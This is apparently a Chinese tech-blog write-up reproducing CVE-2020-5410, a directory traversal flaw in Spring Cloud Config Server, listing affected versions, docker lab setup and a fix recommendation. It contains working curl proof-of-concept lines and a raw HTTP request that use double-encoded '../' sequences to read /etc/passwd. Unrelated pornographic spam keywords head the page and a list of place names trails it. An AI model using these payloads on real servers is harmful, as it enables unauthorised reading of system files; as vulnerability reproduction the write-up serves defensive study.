亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Spring Cloud Config 目錄穿越漏洞CVE-2020-5410的復現怎么樣的

發布時間:2021-12-29 15:43:53 來源:億速云 閱讀:356 作者:柒染 欄目:安全技術

Spring Cloud Config 目錄穿越漏洞CVE-2020-5410的復現怎么樣的,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。

Spring Cloud Config 目錄穿越漏洞

(CVE-2020-5410)

一、漏洞簡介

Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及較舊的不受支持的版本允許應用程序通過spring-cloud-config-server模塊提供任意配置文件。惡意用戶或攻擊者可以使用特制URL發送請求,這可能導致目錄遍歷攻擊。

二、影響版本

Spring Cloud Config: 2.2.0 to 2.2.2

Spring Cloud Config: 2.1.0 to 2.1.8

三、漏洞環境&漏洞復現

PoC:

curl "vulnerablemachine:port/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"

curl "127.0.0.1:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"

docker環境部署:

docker pull hyness/spring-cloud-config-server:2.1.6.RELEASE

Spring Cloud Config 目錄穿越漏洞CVE-2020-5410的復現怎么樣的

docker run -it --name=spring-cloud-config-server \

-p 8888:8888 \

hyness/spring-cloud-config-server:2.1.6.RELEASE \

--spring.cloud.config.server.git.uri=https://github.com/spring-cloud-samples/config-repo

Spring Cloud Config 目錄穿越漏洞CVE-2020-5410的復現怎么樣的

訪問地址:http://192.168.0.110:8888/

Spring Cloud Config 目錄穿越漏洞CVE-2020-5410的復現怎么樣的

執行POC:

curl "192.168.0.110:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"

Spring Cloud Config 目錄穿越漏洞CVE-2020-5410的復現怎么樣的

Burp執行訪問:

Spring Cloud Config 目錄穿越漏洞CVE-2020-5410的復現怎么樣的

詳細數據包:

GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1

Host: 192.168.0.110:8888

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

系統執行訪問記錄:

Spring Cloud Config 目錄穿越漏洞CVE-2020-5410的復現怎么樣的

四、修復建議:

升級到 Spring Cloud Config 至2.2.3版本或2.1.9版本,并且將Spring-Cloud-Config-Server服務放置在內網中,同時使用Spring Security進行身份驗證。最新版本下載地址為:https://github.com/spring-cloud/spring-cloud-config/releases

看完上述內容,你們掌握Spring Cloud Config 目錄穿越漏洞CVE-2020-5410的復現怎么樣的的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

永济市| 九台市| 泰顺县| 赤壁市| 桓仁| 陇南市| 洛扎县| 贵南县| 东乡| 闽清县| 西充县| 蓬安县| 平凉市| 恩平市| 荥经县| 安国市| 禄丰县| 呼图壁县| 象山县| 金堂县| 墨竹工卡县| 封开县| 成武县| 孟连| 永昌县| 沅陵县| 西乌珠穆沁旗| 新晃| 盘锦市| 盐边县| 石狮市| 城市| 新乐市| 闸北区| 永福县| 黄浦区| 梁平县| 宜兰市| 南充市| 越西县| 华宁县|